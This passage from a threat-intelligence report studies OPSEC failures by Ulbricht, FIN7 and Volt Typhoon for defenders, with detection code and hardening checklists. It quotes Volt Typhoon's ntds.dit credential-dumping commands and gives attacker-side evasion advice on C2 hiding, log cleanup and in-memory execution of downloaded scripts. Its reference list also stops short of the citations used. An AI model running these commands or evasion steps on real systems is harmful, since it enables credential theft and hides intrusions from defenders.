- Copy ntds.dit from the Shadow Copy: Once the shadow copy is created, the actor can copy the ntds.dit file from the snapshot path to a staging directory, typically C:\Windows\Temp\. The command looks similar to this:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Windows\NTDS\ntds.dit C:\Windows\Temp\

The X is a number corresponding to the specific shadow copy created.50

- Alternative Method using ntdsutil: As an alternative to the two-step vssadmin and copy method, actors can use the built-in ntdsutil.exe utility. This tool is designed for Active Directory maintenance but has an “Install From Media” (IFM) function that can be abused to create a copy of the database. This is often executed remotely using the Windows Management Instrumentation Command-line (WMIC) to reduce direct interaction with the server’s console.56 A typical command sequence observed in Volt Typhoon intrusions is:

wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\pro\""

This command uses wmic to remotely create a new process (ntdsutil.exe) and passes it the arguments to activate an instance of NTDS (ac i ntds), use the IFM feature (ifm), and create a full backup in the specified directory (create full…).50

4.2.2 Analysis of Command Syntax

The power of LotL techniques lies in the use of legitimate, signed Microsoft binaries. However, this creates the “LotL Paradox”: the attempt to achieve stealth by using legitimate tools creates a new type of signature. While a system administrator might legitimately use vssadmin or ntdsutil, the specific sequence of vssadmin create followed immediately by a copy from the shadow copy path, or the execution of ntdsutil via wmic with the ifm argument, is rarely part of routine administration and is a strong indicator of malicious activity. This orchestration of legitimate tools forms a distinct, high-fidelity behavioral signature that can be hunted for in command-line and process creation logs.
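As an illustration of hunting for this orchestration, the following minimal Python sketch scans process-creation events (for example, exported from Sysmon or EDR telemetry) for the two patterns described above. The `ProcessEvent` record, the regular expressions, and the 10-minute correlation window are illustrative assumptions, not a vendor rule; they should be tuned against a local baseline, since ntdsutil IFM also has legitimate uses when promoting new domain controllers.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass
class ProcessEvent:
    host: str
    timestamp: float  # seconds since the epoch, assumed normalized upstream
    command_line: str


# Illustrative (hypothetical) patterns for the command sequence described above.
VSS_CREATE = re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.IGNORECASE)
SHADOW_NTDS_COPY = re.compile(r"HarddiskVolumeShadowCopy\d+\\.*ntds\.dit", re.IGNORECASE)
NTDSUTIL_IFM = re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b.*\bcreate\s+full\b", re.IGNORECASE)


def find_ntds_dumps(events: Iterable[ProcessEvent], window_seconds: float = 600.0) -> List[str]:
    """Return one alert string per suspicious event, in time order."""
    alerts: List[str] = []
    last_shadow_create: Dict[str, float] = {}  # host -> time of latest "vssadmin create shadow"
    for ev in sorted(events, key=lambda e: e.timestamp):
        cmd = ev.command_line
        # Single-event signature: ntdsutil invoked with the IFM "create full" arguments.
        if NTDSUTIL_IFM.search(cmd):
            alerts.append(f"{ev.host}: ntdsutil IFM database copy: {cmd}")
        if VSS_CREATE.search(cmd):
            last_shadow_create[ev.host] = ev.timestamp
        elif SHADOW_NTDS_COPY.search(cmd):
            # Sequence signature: ntds.dit read from a shadow copy created shortly before on the same host.
            created = last_shadow_create.get(ev.host)
            if created is not None and ev.timestamp - created <= window_seconds:
                alerts.append(f"{ev.host}: shadow copy created, then ntds.dit copied: {cmd}")
    return alerts
```

The shadow-copy pair is only alerted when both commands occur on the same host within the window, while the ntdsutil pattern fires on its own because it is already a single-command signature.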

4.2.3 OPSEC Link (Violating Principle 3)

The OPSEC vulnerability here is the inherent “noisiness” and specificity of the command sequence required to achieve the actor’s objective. While the individual tools are benign, their combination for this purpose is not. The actors’ TTP, while effective and free of custom malware, creates a detectable pattern. They failed to sufficiently obfuscate this pattern, thus exposing their on-host activity to behavior-based detection rules.

4.3 Technical Deep-Dive: The Open Front Door

Even the most sophisticated state-sponsored actors are not immune to fundamental infrastructure hardening failures. While their on-host tradecraft may be stealthy, their external-facing infrastructure can sometimes betray them through simple misconfigurations.



4.3.1 Web Server Misconfiguration: Directory Listing

A prime example of such a failure is leaving directory listing (also known as directory browsing) enabled on a web server used for staging malware or as a C2 endpoint.51 This feature, when enabled, causes the web server to display a hyperlinked list of all files and subdirectories within a directory if no index file (like index.html or index.php) is present.51

4.3.2 Impact of Directory Listing

This seemingly minor oversight can have catastrophic consequences for an operation. It provides threat hunters and investigators with a direct view into the actor’s toolkit and activities. By simply browsing to a directory, an analyst could discover 51:

- The names and timestamps of malware payloads and scripts.

- Configuration files containing C2 domains or encryption keys.

- Log files containing IP addresses of other compromised victims.

- The overall directory structure of the actor’s server, revealing their organizational methods.
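Triage of a suspected staging server can be partly automated. The sketch below assumes the page has already been fetched and checks the HTML for the `Index of /` title that Apache and Nginx auto-generated listings use, or the `[To Parent Directory]` link typical of IIS directory browsing, then extracts the listed entries. These markers are heuristics, not a complete fingerprint of every server’s listing format, and the helper names are hypothetical.

```python
import re
from html.parser import HTMLParser
from typing import List

# Apache and Nginx auto-generated listings use an "Index of /<path>" title;
# IIS directory browsing typically shows a "[To Parent Directory]" link.
INDEX_OF_TITLE = re.compile(r"<title>\s*Index of /", re.IGNORECASE)
IIS_PARENT_LINK = "[To Parent Directory]"


class _HrefCollector(HTMLParser):
    """Collects the href attribute of every <a> tag in the document."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(value for name, value in attrs if name == "href" and value)


def looks_like_directory_listing(html: str) -> bool:
    return bool(INDEX_OF_TITLE.search(html)) or IIS_PARENT_LINK in html


def listed_entries(html: str) -> List[str]:
    """Return relative links, skipping Apache sort links (?C=...) and parent-directory links."""
    collector = _HrefCollector()
    collector.feed(html)
    return [h for h in collector.hrefs if not h.startswith(("?", "/")) and h != "../"]
```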

While direct public evidence of Russian APTs being compromised via this specific misconfiguration is scarce, it is a known and common failure point. More broadly, Russian state-sponsored actors have been observed gaining initial access to target networks by exploiting misconfigurations in perimeter devices, such as a VPN appliance, demonstrating a pattern of leveraging basic hardening failures.52

4.3.3 OPSEC Link (Violating Principle 5)

This is a fundamental failure to Apply Countermeasures. Disabling directory listing is a one-line configuration change and a standard recommendation in every major web server hardening guide for Apache, Nginx, and IIS.51 Leaving it enabled on an operational server is a basic security hygiene error that creates an unnecessary and easily discovered vulnerability, giving defenders a free, low-effort reconnaissance vector.
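Because the fix is a single directive, it is also easy to audit. The following sketch lints Nginx configuration text for an `autoindex on;` directive and, as a related check, for `listen` directives that are not bound to a loopback address, the binding error the table in Section 5 attributes to the Silk Road server. It is a hypothetical helper built on simple regular expressions rather than a real Nginx parser, so included files, variables, and directives split across lines are out of scope.

```python
import ipaddress
import re
from typing import List

AUTOINDEX_ON = re.compile(r"^\s*autoindex\s+on\s*;", re.IGNORECASE | re.MULTILINE)
LISTEN = re.compile(r"^\s*listen\s+([^;]+);", re.MULTILINE)


def _binds_loopback_only(listen_args: str) -> bool:
    target = listen_args.split()[0]          # drop flags such as default_server
    if target.startswith("unix:"):
        return True                          # Unix domain socket, not network-reachable
    if target.startswith("["):               # IPv6 form, e.g. [::1]:8080
        host = target[1:target.index("]")]
    elif target.isdigit():                   # bare port: listens on every IPv4 address
        return False
    elif ":" in target:                      # IPv4 form, e.g. 127.0.0.1:8080
        host = target.rsplit(":", 1)[0]
    else:
        host = target                        # bare address or hostname
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:                       # "*" or a hostname: treat as exposed
        return False


def audit_nginx_config(text: str) -> List[str]:
    text = re.sub(r"#[^\n]*", "", text)      # naive comment stripping
    findings: List[str] = []
    if AUTOINDEX_ON.search(text):
        findings.append("autoindex on: directory listing enabled")
    for match in LISTEN.finditer(text):
        args = match.group(1).strip()
        if not _binds_loopback_only(args):
            findings.append(f"listen {args}: not bound to loopback")
    return findings
```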

4.4 Forensic Artifacts and Attribution Links

Attributing activity to state-sponsored actors is a complex process that relies on correlating multiple data points over time. Their OPSEC failures provide the key artifacts for this process.

- Infrastructure Reuse: While highly sophisticated groups like APT29 (attributed to Russia’s SVR) often make a concerted effort to use unique, segregated infrastructure for each victim to complicate attribution 66, this practice is not universal. Other Russian-linked actors have been observed reusing IP addresses, domains, and SSL certificates across campaigns, allowing threat intelligence firms to cluster their activity and link it to a single group.13 Even rapid IP rotation does not remove this footprint: the group Trident Ursa (also known as Gamaredon) uses fast flux DNS to cycle through hundreds of IP addresses, but its consistent domain naming patterns and registration habits become the primary indicators for tracking it.68

- Behavioral Fingerprints: Given the ephemeral nature of infrastructure, the most reliable attribution points are often behavioral. The specific command-line syntax, the choice of arguments for LotL binaries (e.g., ntdsutil “ac i ntds” ifm…), the selection of staging directories (C:\Windows\Temp, C:\Users\Public), and the sequence of commands used for credential dumping serve as a more durable fingerprint of the actor’s tradecraft than their IP addresses.10
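Clustering by shared artifacts is, at its core, a connected-components problem. The sketch below is a hypothetical helper, not any threat intelligence vendor’s method: it groups indicators (here, domains) that share any artifact, such as a TLS certificate fingerprint or an IP address, directly or transitively, using a union-find structure. The artifact strings are placeholders; behavioral fingerprints such as a normalized command line can be fed in the same way.

```python
from collections import defaultdict
from typing import Dict, List, Set


def cluster_by_shared_artifacts(observations: Dict[str, Set[str]]) -> List[Set[str]]:
    """Group indicators that share at least one artifact, directly or transitively."""
    parent = {indicator: indicator for indicator in observations}

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving keeps the trees shallow
            x = parent[x]
        return x

    def union(a: str, b: str) -> None:
        root_a, root_b = find(a), find(b)
        if root_a != root_b:
            parent[root_b] = root_a

    owner: Dict[str, str] = {}  # artifact -> first indicator seen with it
    for indicator, artifacts in observations.items():
        for artifact in artifacts:
            if artifact in owner:
                union(owner[artifact], indicator)
            else:
                owner[artifact] = indicator

    groups: Dict[str, Set[str]] = defaultdict(set)
    for indicator in observations:
        groups[find(indicator)].add(indicator)
    # Largest clusters first; ties broken alphabetically for stable output.
    return sorted(groups.values(), key=lambda g: (-len(g), sorted(g)))
```

In practice the value lies in transitive links: two domains that never share an artifact directly still end up in one cluster if each shares something with a third.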

Section 5: Synthesis and Cross-Case Analysis

5.1 Recurring Patterns of Technical Failure

The analysis of Ross Ulbricht, FIN7, and state-sponsored actors (Russian APTs and the PRC-linked Volt Typhoon) reveals that despite their vastly different motivations, resources, and levels of sophistication, they all fell victim to a common set of fundamental technical failures. These recurring patterns can be synthesized into four distinct classes.

- Class 1: Identity Leakage via Public Code Snippets and Forum Activity. This pattern is defined by the failure to maintain strict compartmentalization between real-world identities and operational personas. It is most clearly exemplified by Ross Ulbricht, who used his real name and email address on a public programming forum to solve a technical problem directly related to his criminal enterprise.14 This created a permanent, publicly indexed link between his identity and the Silk Road’s technical underpinnings.

- Class 2: Insecure C2 Infrastructure Configuration and Default Settings. This pattern involves the deployment of powerful offensive security tools without performing the necessary and available hardening and customization. FIN7 is the archetypal example, frequently using the Cobalt Strike C2 framework with its default settings: the default Team Server port (TCP/50050), the default self-signed TLS certificate, and default naming conventions for its SMB named pipes.12 This failure handed defenders a set of stable, high-fidelity IOCs, transforming a versatile, stealthy tool into a conspicuous beacon.

- Class 3: Data Exposure via Misconfigured Web-Facing Services. This pattern encompasses the failure to apply basic security hardening principles to internet-facing infrastructure. It was a critical failure for Ulbricht, whose misconfigured web server leaked its true IP address, bypassing the entire protection of the Tor network.4 It also cuts both ways for APTs: Russian actors have exploited misconfigured perimeter devices to gain initial access,52 while a simple misconfiguration like directory listing on an actor’s own staging server can expose its entire toolkit to public view.51

- Class 4: Infrastructure Footprint Reuse and Predictable Patterns. This pattern includes both the direct reuse of infrastructure (IP addresses, domains) across campaigns and the repeated use of highly signature-able TTPs. While some Russian APTs are meticulous about infrastructure segregation 66, others have been tracked through their reuse of assets.13 More subtly, the reliance on a specific, un-obfuscated sequence of LotL commands for credential dumping by actors like Volt Typhoon creates a predictable behavioral footprint, which is as reliable for hunting as a static IP address.50

5.2 The Disconnect: Advanced TTPs on a Brittle Foundation

The central paradox highlighted by these case studies is the disconnect between the sophistication of certain components of an attack and the rudimentary nature of the failures that compromise it. A state-sponsored actor like Volt Typhoon can maintain stealthy persistence inside critical infrastructure networks for years, yet rely on a well-documented and easily signatured command sequence to dump credentials.49 A criminal group like FIN7 can develop and execute a complex supply chain attack involving physical devices mailed to targets, yet fail to change a default port number on their C2 server.12 This disconnect is not random; it stems from a combination of cognitive biases, operational pressures, and organizational structures.

- Cognitive Bias and Resource Allocation: Threat actors, like any project managers, allocate their finite resources (time, money, and expertise) to what they perceive as the most difficult challenges. For an APT, this might be developing a zero-day exploit or a novel persistence mechanism. For FIN7, it was the social engineering and logistics of the BadUSB campaign. The “easy” parts, such as configuring a C2 server or hardening a staging web server, are often neglected or delegated, being perceived as low-risk administrative tasks. This creates a brittle foundation where the most advanced components of an operation rest upon the most fragile, insecure configurations.

- Operational Scalability vs. Security: For financially motivated actors like FIN7, operations are a business driven by volume and efficiency. The need for rapid, scalable deployment of infrastructure favors the use of standardized, default configurations. Customizing a Malleable C2 profile for every C2 server is time-consuming and requires a higher level of operator skill.30 Using defaults is fast and repeatable. This is a deliberate trade-off, prioritizing operational tempo over deep stealth, and accepting a higher rate of infrastructure discovery and takedown as a cost of doing business.

- Specialization and Organizational Silos: In larger, more structured operations, particularly state-sponsored groups, there is often a high degree of specialization. The team that develops the custom malware and exploits may be entirely separate from the team that procures and manages the operational infrastructure. This can lead to a “throw it over the wall” mentality, where an advanced toolset is deployed by operators who may lack a deep understanding of its configuration options or the OPSEC implications of using default settings.

- The Path of Least Resistance: Adversaries often use the simplest and most direct method that reliably achieves their objective. The default LotL sequence for dumping ntds.dit works effectively and uses native, trusted binaries. Until this method is consistently and universally detected and blocked at the behavioral level, there is little incentive for an actor to invest in developing a stealthier, more complex, and potentially less reliable alternative. They will continue to use the path of least resistance until it is no longer viable.

The following table provides a visual synthesis of these recurring failure patterns across the three distinct threat actor archetypes, underscoring the universality of these fundamental OPSEC mistakes.

| Case Study | Class 1: Identity Leakage | Class 2: Insecure Configuration | Class 3: Misconfigured Services | Class 4: Predictable Patterns |
|---|---|---|---|---|
| Ross Ulbricht | Used real name and email on public forums for technical help related to Silk Road.14 | N/A (Custom C2) | Web server leaked its true IP address due to a service binding to the public interface.4 | Reused “altoid” and “frosty” personas across platforms, creating a correlatable trail.9 |
| FIN7 | N/A (Group identity) | Used default Cobalt Strike settings: TCP port 50050, default TLS certificate, default named pipes.12 | N/A | Deployed BadUSB devices with a static, identifiable VID/PID hardware signature.26 |
| Russian APTs / Volt Typhoon (PRC) | N/A (State-sponsored identity) | N/A (Often use custom C2) | Directory listing on staging servers is a known failure point, though direct public evidence is scarce; Russian actors gained initial access via misconfigured VPNs.51,52 | Volt Typhoon used a specific, signature-able sequence of LotL commands (vssadmin, ntdsutil) for credential dumping; some Russian-linked actors reused IP addresses across campaigns.13,50 |

Section 6: Actionable Intelligence: Countermeasures and Hardening

The analysis of these systemic failures directly informs a set of specific, technical countermeasures. By addressing the root causes of the adversaries’ mistakes, organizations can significantly harden their environments and disrupt the attack lifecycle.

6.1 Hardening C2 Infrastructure (Countering FIN7’s Failures)

For red teams using adversary simulation frameworks and blue teams defending against them, preventing the use of default indicators is paramount. The following hardening procedures should be considered standard practice for any deployment of frameworks like Cobalt Strike.

- Malleable C2 Configuration Checklist:

- Generate Unique TLS Certificates: Never use the default self-signed certificate. Generate a valid, domain-validated certificate for each C2 domain using a service like Let’s Encrypt. This removes a key network IOC and makes HTTPS C2 traffic much harder to distinguish from legitimate web traffic at the TLS layer.32

- Change Default Ports: The default Team Server listener port of TCP/50050 should be changed and firewalled from public access. C2 listener ports for beacons should be configured to use common service ports (e.g., 80, 443, 8080, 8443) to blend in with expected network traffic.29

- Customize HTTP Indicators: The Malleable C2 profile must be edited to change all default HTTP indicators. This includes modifying the uri, request verb (GET/POST), User-Agent header, and other HTTP headers to mimic the traffic of a legitimate, common application within the target environment.30

- Modify Named Pipe Patterns: The default named pipe names used for SMB beacons must be changed within the Malleable C2 profile. The pipename, pipename_stager, and post-ex -> pipename settings should be configured to use names that appear benign or mimic legitimate Windows inter-process communication.41

- Infrastructure Segregation and Redirection:

- The core C2 Team Server should never be directly exposed to the internet. All beacon traffic should be routed through one or more redirectors (e.g., reverse proxies using Apache mod_rewrite or Nginx). This practice obscures the true IP address of the C2 server. If a redirector’s IP is identified and blocked by defenders, the core infrastructure remains operational, and a new redirector can be quickly deployed.33
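On the defensive side, the same default indicators make a quick triage check. The following sketch flags the three defaults discussed in this report: the Team Server port TCP/50050, a TLS certificate subject containing `Major Cobalt Strike` (the string commonly reported in the default self-signed certificate), and named pipes matching widely documented default patterns (`msagent_*`, `status_*`, `postex_*`, `MSSE-*-server`). The `HostObservation` record is hypothetical, and the patterns are assumptions to be checked against maintained detection content, such as the Splunk and Elastic rules cited in this report, before relying on them.

```python
import re
from dataclasses import dataclass, field
from typing import List

TEAMSERVER_DEFAULT_PORT = 50050
DEFAULT_CERT_MARKER = "major cobalt strike"  # compared case-insensitively
# Commonly reported default pipe patterns (SMB beacon, stager, post-ex, artifact kit).
# Assumed values: verify against current detection content.
DEFAULT_PIPE = re.compile(
    r"^\\?(msagent_[0-9a-f]+|status_[0-9a-f]+|postex_[0-9a-f]+|MSSE-\d+-server)$",
    re.IGNORECASE,
)


@dataclass
class HostObservation:
    host: str
    open_ports: List[int] = field(default_factory=list)
    tls_subjects: List[str] = field(default_factory=list)  # certificate subject DNs seen on the host
    pipe_names: List[str] = field(default_factory=list)    # e.g. from Sysmon named-pipe events


def default_indicator_hits(obs: HostObservation) -> List[str]:
    hits: List[str] = []
    if TEAMSERVER_DEFAULT_PORT in obs.open_ports:
        hits.append(f"{obs.host}: TCP/{TEAMSERVER_DEFAULT_PORT} open (default Team Server port)")
    for subject in obs.tls_subjects:
        if DEFAULT_CERT_MARKER in subject.lower():
            hits.append(f"{obs.host}: default certificate subject: {subject}")
    for pipe in obs.pipe_names:
        if DEFAULT_PIPE.match(pipe):
            hits.append(f"{obs.host}: default-style named pipe: {pipe}")
    return hits
```

A hit here only shows that a default was left in place; as this section notes, a hardened deployment will not match any of these checks, so an empty result is not evidence of absence.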

6.2 Reducing Forensic Artifacts (Countering Ulbricht’s & APTs’ Failures)

These countermeasures focus on minimizing the digital trail left by operational activities, both online and on-host.

- Identity and Persona Management:

- Establish and enforce a strict policy of compartmentalization. Never use personal, real-world information (names, emails, usernames) for any operational activity.

- Each operational persona should have a unique, non-correlated set of accounts and credentials.

- Use separate, sterile virtual machines or physical devices for different operational roles (e.g., development, C2 management, reconnaissance) to prevent cross-contamination of artifacts.

- On-Host Artifact Reduction:

- When using LotL techniques, operators must be meticulous about cleanup. This includes securely deleting any staged files from temporary directories (e.g., C:\Windows\Temp, C:\Users\Public) and clearing command-line histories (e.g., PowerShell history files).

- Avoid writing tools or scripts to disk whenever possible. Leverage in-memory execution capabilities, such as PowerShell’s Invoke-Expression with downloaded scripts, to minimize the on-disk footprint.

- Web Server Hardening Checklist:

- Disable Directory Listing: This should be a default configuration for all production web servers.

- For Apache, use Options -Indexes in the .htaccess or server configuration file.

- For Nginx, ensure autoindex is not set to on; autoindex off; is the default, and setting it explicitly documents the intent.

- For IIS, disable “Directory Browsing” in the server settings.51

- Correct Service Binding: For services intended to be accessed only via an anonymizing network like Tor, ensure the service daemon is configured to bind only to the localhost interface (127.0.0.1). Use host-based firewall rules (e.g., iptables or Windows Firewall) to explicitly deny any incoming connections to the service’s port from any source other than localhost.

- Restrict Administrative Interfaces: Web-based administrative interfaces like phpMyAdmin or server management panels should never be exposed to the public internet. Access should be restricted to whitelisted IP addresses via firewall rules or require authentication through a VPN.

- VPN and Remote Access Security:

- Enforce phishing-resistant Multi-Factor Authentication (MFA) on all external-facing remote access services, including VPNs, RDP gateways, and cloud administration portals.

- Implement and monitor strong password policies to mitigate the effectiveness of password spraying and brute-force attacks, which are common initial access vectors for APTs.52
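Password spraying differs from brute force in that one source tries a few passwords against many accounts. A minimal sketch of a detection heuristic, assuming failed-authentication events have already been normalized into the hypothetical `AuthFailure` record, counts distinct usernames per source IP inside a sliding window. The 15-minute window and 10-account threshold are placeholder values, not recommendations.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, Iterable, Set, Tuple


@dataclass
class AuthFailure:
    timestamp: float  # seconds since the epoch
    source_ip: str
    username: str


def detect_spraying(
    failures: Iterable[AuthFailure],
    window_seconds: float = 900.0,
    min_accounts: int = 10,
) -> Set[str]:
    """Flag source IPs whose failed logins hit at least min_accounts distinct accounts within one window."""
    recent: Dict[str, Deque[Tuple[float, str]]] = defaultdict(deque)
    flagged: Set[str] = set()
    for event in sorted(failures, key=lambda e: e.timestamp):
        window = recent[event.source_ip]
        window.append((event.timestamp, event.username))
        # Evict failures that fell out of the sliding window for this source.
        while event.timestamp - window[0][0] > window_seconds:
            window.popleft()
        if len({user for _, user in window}) >= min_accounts:
            flagged.add(event.source_ip)
    return flagged
```

Repeated failures against a single account (classic brute force) need a separate per-account counter, and spraying distributed across many source addresses will evade a per-IP rule like this one.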

Conclusion

The evidence presented across these disparate case studies, from an amateur darknet market operator to a sophisticated cybercrime syndicate and elite state-sponsored espionage groups, converges on a single, powerful conclusion: operational security is not a fortress breached by a single, overwhelming force, but a chain of dominoes toppled by a series of small, preventable nudges. The most advanced malware, the most creative social engineering, and the most patient persistence techniques are consistently and effectively neutralized by the discovery of fundamental technical and procedural errors.

Ross Ulbricht’s operation was not undone by a flaw in Tor’s cryptography, but by his decision to ask for coding help under his real name. FIN7’s advanced BadUSB campaign was not defeated by an impossible-to-develop hardware detection capability, but by their failure to change the default certificate in their C2 software. The long-term stealth of state-sponsored actors like Volt Typhoon is not directly threatened by a revolutionary new EDR technology, but by the fact that their on-host actions, though using legitimate tools, create a predictable and detectable behavioral rhythm.

This reality presents a significant strategic advantage for defenders. It demonstrates that investment in mastering the fundamentals of security hygiene yields a disproportionately high return. By focusing resources on rigorous configuration management, comprehensive logging and monitoring of command-line activity, proactive infrastructure hardening, and the enforcement of strict identity compartmentalization, organizations can create an environment that is inherently hostile to adversaries. In such an environment, every action an attacker takes, no matter how stealthy, generates friction and leaves a trace. Their mistakes become inevitable, and for the prepared defender, those mistakes are the critical signals that transform a stealthy intrusion into a detected and neutralized event. The ultimate countermeasure, therefore, is not a single product, but a culture of relentless attention to the foundational details of security engineering.

1. Introduction to OPSEC (Part 1) – Hacktive Security, [https://www.hacktivesecurity.com/blog/2025/01/21/introduction-to-opsec-part-1/]

2. Ross William Ulbricht’s Laptop | Federal Bureau of Investigation – FBI, [https://www.fbi.gov/history/artifacts/ross-william-ulbrichts-laptop]

3. Confusing Privacy with Security: The Fatal Mistake – Blog, [https://www.securecodewarrior.com/article/confusing-privacy-with-security-the-fatal-mistake]

4. Dread Pirate Sunk By Leaky CAPTCHA – Krebs on Security, [https://krebsonsecurity.com/2014/09/dread-pirate-sunk-by-leaky-captcha/]

5. FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7 | Mandiant | Google Cloud Blog, [https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7]

6. Joint Guidance: Identifying and Mitigating Living Off the Land Techniques – CISA, [https://www.cisa.gov/sites/default/files/2025-03/Joint-Guidance-Identifying-and-Mitigating-LOTL508.pdf]

7. Threat Group Assessment: Turla (aka Pensive Ursa), [https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/]

8. Living off the land: CISA issues guidance on detection | Barracuda Networks Blog, [https://blog.barracuda.com/2024/03/21/living-off-the-land–cisa-issues-guidance-on-detection]

9. Forensic Accounting: Cracking the Silk Road & Capturing Darknet’s …, [https://www.forensicscolleges.com/blog/forensics-casefile/silk-road]

10. Suspected Russian Activity Targeting Government and Business Entities Around the Globe | Mandiant | Google Cloud Blog, [https://cloud.google.com/blog/topics/threat-intelligence/russian-targeting-gov-business/]

11. Lessons Learned from the Silk Road Investigation – Belkasoft, [https://belkasoft.com/silk-road-investigation-lessons-learned]

12. Footprints of Fin7: Tracking Actor Patterns (Part 1) – Gigamon Blog, [https://blog.gigamon.com/2017/07/26/footprints-of-fin7-tracking-actor-patterns-part-1/]

13. Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets | CISA, [https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-296a]

14. (PDF) The Evidentiary Trail Down Silk Road – ResearchGate, [https://www.researchgate.net/publication/319164300_The_Evidentiary_Trail_Down_Silk_Road]

15. Silk Road (marketplace) – Wikipedia, [https://en.wikipedia.org/wiki/Silk_Road_(marketplace)]

16. How was Ross Ulbricht’s IP address in San Francisco linked to Silk Road?, [https://security.stackexchange.com/questions/272589/how-was-ross-ulbrichts-ip-address-in-san-francisco-linked-to-silk-road]

17. Silk Road: The Dark Side of Cryptocurrency – Fordham Law News, [https://news.law.fordham.edu/jcfl/2018/02/21/silk-road-the-dark-side-of-cryptocurrency/]

18. Computer Forensics Critical in the Trial of Silk Road’s Ross Ulbricht – HSToday, [https://www.hstoday.us/best-practices/computer-forensics-critical-in-the-trial-of-silk-road-s-ross-ulbricht/]

19. curl sighting: Silk Road | daniel.haxx.se, [https://daniel.haxx.se/blog/2022/12/10/curl-sighting-silk-road/]

20. How can I connect to a Tor hidden service using cURL in PHP …, [https://stackoverflow.com/questions/15445285/how-can-i-connect-to-a-tor-hidden-service-using-curl-in-php]

21. Dark web PHP dev Ross Ulbricht released from prison… – YouTube, [https://www.youtube.com/watch?v=gi-wuoIDdjw]

22. Silk Road Founder Loses Argument That the FBI Illegally Hacked Servers to Find Evidence against Him, [https://jolt.law.harvard.edu/digest/silk-road-founder-loses-argument-that-the-fbi-illegally-hacked-servers-to-find-evidence-against-him]

23. Does this explanation of how the FBI found Silk Road’s IP make sense? – Reddit, [https://www.reddit.com/r/AskNetsec/comments/2fujh6/does_this_explanation_of_how_the_fbi_found_silk]

24. The FBI lied about how it found the location of the Silk Road servers : r/technology – Reddit, [https://www.reddit.com/r/technology/comments/2i6ffv/the_fbi_lied_about_how_it_found_the_location_of]

25. How Did the FBI Find the Silk Road Servers, Anyway? – VICE, [https://www.vice.com/en/article/how-did-the-fbi-find-the-silk-road-servers-anyway/]

26. FIN7 Cyber Actors Target US Businesses Through … – Rackcdn.com, [https://dd80b675424c132b90b3-e48385e382d2e5d17821a5e1d8e4c86b.ssl.cf1.rackcdn.com/external/mu-000160-mw.pdf]

27. The FIN7 Cyber Actors Targeting US Businesses through USB Keystroke Injection Attacks, [https://dts.ucla.edu/news/fin7-cyber-actors-targeting-us-businesses-through-usb-keystroke-injection-attacks]

28. FIN7, GOLD NIAGARA, ITG14, Carbon Spider, ELBRUS, Sangria Tempest, Group G0046, [https://attack.mitre.org/groups/G0046/]

29. SECURITY BLOG: THE HISTORY OF COBALT STRIKE – October 25th, 2022 – RedLegg, [https://www.redlegg.com/blog/cobalt-strike]

30. Malleable C2 | Cobalt Strike Features, [https://www.cobaltstrike.com/product/features/malleable-c2]

31. How the Malleable C2 Profile Makes Cobalt Strike Difficult to Detect, [https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/]

32. Cobalt Strike as a Threat to Healthcare – HHS.gov, [https://www.hhs.gov/sites/default/files/cobalt-strike-tlpwhite.pdf]

33. Defining Cobalt Strike Components & BEACON | Google Cloud Blog, [https://cloud.google.com/blog/topics/threat-intelligence/defining-cobalt-strike-components]

34. Dissecting The Cobalt Strike Beacon – ThreatSpike, [https://www.threatspike.com/blog/dissecting-the-cobalt-strike-beacon/]

35. Cobalt Strike – Red Canary Threat Detection Report, [https://redcanary.com/threat-detection-report/threats/cobalt-strike/]

36. Responding to a Cobalt Strike attack — Part I | by Invictus Incident Response | Medium, [https://invictus-ir.medium.com/responding-to-a-cobalt-strike-attack-part-i-890a6cbbfff1]

37. Detecting Exposed Cobalt Strike DNS Redirectors – WithSecure™ Labs, [https://labs.withsecure.com/publications/detecting-exposed-cobalt-strike-dns-redirectors]

38. Default Cobalt Strike Team Server Certificate | Prebuilt detection rules reference – Elastic, [https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/network/command_and_control_cobalt_strike_default_teamserver_cert]

39. Named Pipe Pivoting – Cobalt Strike, [https://www.cobaltstrike.com/blog/named-pipe-pivoting]

40. Cobalt Strike, Software S0154 – MITRE ATT&CK®, [https://attack.mitre.org/software/S0154/]

41. Learn Pipe Fitting for all of your Offense Projects – Cobalt Strike, [https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects]

42. Detecting & Hunting Named Pipes: A Splunk Tutorial, [https://www.splunk.com/en_us/blog/security/named-pipe-threats.html]

43. Detection: Cobalt Strike Named Pipes | Splunk Security Content, [https://research.splunk.com/endpoint/5876d429-0240-4709-8b93-ea8330b411b5/]

44. FalconFriday — Suspicious named pipe events — 0xFF1B | by Olaf Hartong – Medium, [https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8]

45. Defending Against Volt Typhoon: A State-Sponsored Stealthy Threat to Critical Infrastructure, [https://www.netsecurity.com/defending-against-volt-typhoon-a-state-sponsored-stealthy-threat-to-critical-infrastructure/]

46. APT29, IRON RITUAL, IRON HEMLOCK, NobleBaron, Dark Halo, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke, SolarStorm, Blue Kitsune, UNC3524, Midnight Blizzard, Group G0016 | MITRE ATT&CK®, [https://attack.mitre.org/groups/G0016/]

47. APT28 Malware | Russia’s Cyber Espionage Operations Report | Google Cloud Blog, [https://cloud.google.com/blog/topics/threat-intelligence/apt28-a-window-into-russias-cyber-espionage-operations]

48. What Is a Living Off the Land (LotL) Attack? – JumpCloud, [https://jumpcloud.com/it-index/what-is-a-living-off-the-land-lotl-attack]

